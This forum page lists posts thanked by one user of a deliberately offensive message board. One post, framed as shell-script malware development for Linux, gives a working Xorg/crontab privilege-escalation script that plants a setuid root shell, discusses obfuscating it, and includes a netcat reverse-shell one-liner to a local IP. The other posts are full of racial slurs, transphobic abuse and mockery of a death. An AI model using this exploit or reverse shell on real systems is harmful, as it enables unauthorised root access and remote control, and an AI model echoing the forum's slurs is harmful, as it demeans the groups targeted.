User Controls

Navigation

Niggas in Space > Users > hydromorphone > Posts Thanked
  3. 1
  4. 2
  5. 3
  6. 4
  7. 5
  8. ...
  9. 88
  10. 89
  11. 90
  12. 91

Posts That Were Thanked by hydromorphone

  1. 2021-07-28 at 12:18 PM UTC in The Retarded Thread: Get off that bus edition
    the man who put it in my hood Black Hole [miraculously counterclaim my golf]
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. 2021-07-24 at 7:24 AM UTC in Sh/Bash based malware for *Nix.
    Sophie Pedophile Tech Support
    Welcome to another edition of Sophie's Cyber Shenanigans. This thread, i got some unconventional ways to work on *Nix based malware. And a couple questions for the level 97 shell script wizards.

    So i am experimenting with shell scripts, to find out what is and isn't viable should i want to create a shell script based malware for loonix. Why shell script? They're easily obfuscated, a bunch of utils have PE/Static binary formats you can bring along, or deploy remotely, and all distros have `Sh` and almost always `Bash` as far as i am aware.

    What's more, shell scripts, allow one to invoke commands and operations from any scripting lang that have their interpreter installed on the distro you are targeting 'out of the box' as it. Which tend to be quite a few.

    Chances are you'll have access to: Perl, Python, Lua, TclSh, M4(Plus other Macro 'langs') and if you're lucky PHP, Ruby, Node and so on and so forth.

    Another benefit of using `Sh` or `Bash` is that you don't have to worry about compatibility issues. Should you want to make use of payloads written in let's say C, you have the opportunity to perform Recon simply with the `uname -svm` command and then you'll have the proper architecture and kernel version. Which is great to know if you want to write an exploit for the system you're on.

    Here's an example.


    #!/bin/bash


    # There are a bunch of vulns in the Xorg server and related utils like
    #
    # X.Org xorg-x11-xfs - Local Race Condition
    # xorg-x11-server - 'inittab Local Privilege Escalation 
    #
    # And much more, we're gonna do the second one as an example
    #                                  
    # When ##!!## occurs in the script i got some annotations below
    #
    cat << EOF > /tmp/x_orgasm                           
    cp /bin/sh /usr/local/bin/pwned                                        ##!!##_1
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
    gcc /tmp/pwned.c -o /usr/local/bin/pwned                               ##!!##_2
    chmod 4777 /usr/local/bin/pwned
    EOF

    chmod +x /tmp/x_orgasm


    # prepare your anus
    cd /etc                                                         
    Xorg -fp "* * * * * root /tmp/x_orgasm" -logfile crontab :1 &   ##!!##_3 
    sleep 5
    pkill Xorg                                                      ##!!##_4

    sleep 120

    ls -l /etc/crontab*
    ls -l /usr/local/bin/pwned

    # Start elevated Sh
    /usr/local/bin/pwned


    ##!!##_1
    Before you say: you can't just copy /bin/sh. Well we don't really need to the line after that builds a Sh shell too.
    If you're afraid we won't have permissions for `gcc` here's something that'll do exactly the same with UID 0.


    Alternatively we could ship a shell in Asm with the payload up top.

    ##!!##_2

    /tmp and some of the other directories featured here get mounted as NOSUID which is good. Because NOSUID beats root.

    /usr/local/bin is part of the $PATH and has MODE 2775/drwxrwsr-x


    ##!!##_3

    The operation here is what triggers the bug. Without getting too much into the weeds killing Xorg at ##!!##_4 with pkill will cause inittab to retart the cronjob related to Xorg that we changed with the operation we ran previously which then starts our 'pwned' Sh with root privileges.

    Obfuscation

    There's tools to obfuscate bash. Which is great. Here's an example of this same script obfuscated with the methods below.


    String/Hex Hash, 1 Iteration
    Token/ForCode, 1 Iteration


    Find the result here

    Or if you prefer a picture check the spoiler out below.




    Anyway, i hope you found that informative. However before you go i do actually have a question for the level 97 shell script wizards.

    I want to have a function in a shell script that i can call with different commands, so `cmd_func cat /etc/passwd`. My current implementation looks like this:


    #!/usr/bin/env -S sh\_"umask\_700"\_-f 
    # BTW This is legal right ^
    #
    # I'm U_masking because i am writing stuff out
    # Under a specific user account

    buff_ops()
    {   # I want to run it through a FIFO pipe/buffer in fact it is a requirement.
        cmd=$0
        arg=$1
        mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
    };

    buff_ops CMD ARG # <- is what i want


    I figured it should be good since stuff like this works also:

    rm -f x; mknod x p && nc 192.168.1.10 1337 0<x | /bin/bash 1>x


    Thicc threads niggas. One on low level security and dev incoming soon as well.
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. 2021-07-13 at 5:49 PM UTC in Would you be opposed to having a Tor Mirror?
    Sophie Pedophile Tech Support
    Originally posted by ⠀⠀⠀⠀⠀⠀ I read every post. Thing is, all your ideas are useless and serve no real purpose or need. The only reason you post it is to attention-whore and show off. It's an ego thing, not a knowledge is power thing. Truth.

    I've been over the whole "look i can do an SQLi on some Indian half assed site aren't i cool" phase since 2016. Ask anyone that knows their shit whether my projects, especially my OSS Github projects serve no purpose, have no value, or anything like that. No need to report back, the only thing that will transpire is that they'll chastise you for your ignorance. Unless they are naturally disposed to being polite, even to 70yo skids like yourself.

    Also, i know you don't know this because you don't hang out with people who are exceptionally talented, more talented than i am, at all things cyber, but if someone comes into a serious community attention whoring and trying to 'show off'. They get chased off of venues, where the people i mentioned congregate.

    You can't fake competence at the level at which most of the tech crowd here and elsewhere operates. Which is why no one takes you serious in T&T.
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. 2021-07-08 at 4:07 PM UTC in Ohio BANS Healthcare for trannies!
    the man who put it in my hood Black Hole [miraculously counterclaim my golf]
    Who the fuck cares about trannies like honestly everyone needs to shut the fuck up. Literally every day HURR DURR TRANNIES but I never hear anyone talk about drug legalization or anything that actually matters.

    Social issue politics get fucked. OH NO GAY PPEOPLE ARE SCARY SAVE ME DONALDS TRUMP!!! This is why everything is fucked because everyone blows their load arguing about a tranny in a bathroom and when it comes time to tackle the real issues everyone is too tired and burnt out, just keep the status quo so I can yell at trannies some more.

    The following users say it would be alright if the author of this post didn't die in a fire!
  5. 2021-07-02 at 7:27 AM UTC in Serious Question. Why is everyone here so mean?
    Kev Space Nigga
    Originally posted by AngryIVer If you think people here are mean you'd have never lasted a day on Totse.

    People here are pussies if anything.

    seriously

    i was on there for years and had less than 150 posts, totse was fucking intimidating. this knockoff aint shit compared to the temple.
    The following users say it would be alright if the author of this post didn't die in a fire!
  6. 2021-07-01 at 11:42 PM UTC in Serious Question. Why is everyone here so mean?
    Sophie Pedophile Tech Support
    I'm generally nice as long as other people are nice to me.
    The following users say it would be alright if the author of this post didn't die in a fire!
  7. 2021-07-01 at 11:35 PM UTC in Serious Question. Why is everyone here so mean?
    AngryIVer African Astronaut [my jade controlled morrigan]
    Originally posted by Quick Mix Ready Really. Cant you guys be nicer to each other and to yourselves

    If you think people here are mean you'd have never lasted a day on Totse.

    People here are pussies if anything.
    The following users say it would be alright if the author of this post didn't die in a fire!
  8. 2021-07-01 at 5:52 PM UTC in How did that fucktard Bill Krozby die?
    aldra JIDF Controlled Opposition
    Originally posted by Netflxchillr Very sad he harmed himself, & even sadder for his child having no father.

    he wasn't involved in her life and wasn't paying child support, probably wasn't too much of a loss to her
    The following users say it would be alright if the author of this post didn't die in a fire!
  9. 2021-06-22 at 1:43 AM UTC in Spare change!!
    AngryOnion Big Wig [the nightly self-effacing broadsheet]
    I got baked today and rolled 300 bucks in spare change!!
    Most money I've made in months.
    I'm going to upgrade an older computer with mv2 ssd in a empty pcie.
    The following users say it would be alright if the author of this post didn't die in a fire!
  10. 2021-06-07 at 7:12 PM UTC in Hot humid east coast; No mask
    Quick Mix Ready Dark Matter [jealously defalcate my upanishad]
    I miss the theater. even though I said I may not have to go to a theater with my home projector, it's not the same.

    plus it's not that great of a projector. I'm waiting for the 8k lazer ones to come down in price. they're bad ass. they project underneath but are like OLED quality but probably better.

    but I really like going to the IMAX and sitting in the very front row where no one sits and stare up at boobies and butts. I still have not been to an IMAX 3D film yet. most films in 3D now are 3D animated which makes 3D glasses a bit overkill. 3D/3D is just stupid

    Originally posted by mmQ Things back to normal here in North Kadoty. Mask mandate lifted a while back and restaurants/bars/venues are quite packed. Large gatherings, live music, etc. all getting back in the swing of things just in time for summer. 🤩🤩
    The following users say it would be alright if the author of this post didn't die in a fire!
  11. 2021-06-04 at 10:45 PM UTC in Blocking license plate readers
    I Live In Your Crawlspace Secretly4 Space Nigga
    Sovereign citizens don't need plates
    The following users say it would be alright if the author of this post didn't die in a fire!
  12. 2021-05-29 at 1:45 PM UTC in Told you so thread for when COVID is confirmed to be laboratory made
    WellHung Black Hole
    Originally posted by Solstice You can tell it was man made because of how quickly it mutated and how infectious it is/was. That's a bioweapon, it didn't conveniently fall out of a bat's asshole.

    but u have never seen pussy since u were born.
    The following users say it would be alright if the author of this post didn't die in a fire!
  13. 2021-03-10 at 12:10 AM UTC in Christianity is insanity
    aldra JIDF Controlled Opposition
    Originally posted by Antifa Member Why not

    Are you religious

    The following users say it would be alright if the author of this post didn't die in a fire!
  14. 2021-03-08 at 9:31 PM UTC in April is showing her daughter the ropes
    Nile bump
    Bill Krozby said hios daughter died like 2 times lol, he probably didn't even have a dog.
    The following users say it would be alright if the author of this post didn't die in a fire!
  15. 2021-03-03 at 8:19 PM UTC in I just found out that Kr0z went missing
    Ebola Cola Houston
    His Boss is beyond Angry

    The following users say it would be alright if the author of this post didn't die in a fire!
  16. 2021-02-19 at 3:16 PM UTC in The Retarded Thread: Get off that bus edition
    WolfgangBladt Houston
    ive decided to quit opes today. i am finally ready. over the years and attempts ive realised that the key is not planning, but to not go for that final hit, and make your previous one your final. threw out my last pickup today. cold turkey will be a bitch but i am ready.
    The following users say it would be alright if the author of this post didn't die in a fire!
  17. 2021-02-18 at 4:28 AM UTC in The Retarded Thread: Get off that bus edition
    Joseph R. Biden Jr, 46th President of the United States of America African Astronaut
    The following users say it would be alright if the author of this post didn't die in a fire!
  18. 2021-02-17 at 4:42 AM UTC in Bipolarhighroller/1337
    rabbitweed African Astronaut
    Originally posted by STER0S i thought it was bradley b that fucked his asshole

    but hydro directed the cock

    she was the cock master

    in §m£ÂgØLs mind, it was her throbbing cock the whole time

    and it's destroyed him
    The following users say it would be alright if the author of this post didn't die in a fire!
  19. 2021-02-14 at 7:49 PM UTC in Alcohol withdrawal. Pain
    Antifa Member African Astronaut
    Anyone who takes drug advice from Bill Krozby deserves seizures honestly
    The following users say it would be alright if the author of this post didn't die in a fire!
  20. 2021-02-14 at 7:50 AM UTC in My friend is a gun nut
    netstat African Astronaut
    edited for privacy
    The following users say it would be alright if the author of this post didn't die in a fire!
  3. 1
  4. 2
  5. 3
  6. 4
  7. 5
  8. ...
  9. 88
  10. 89
  11. 90
  12. 91
Jump to Top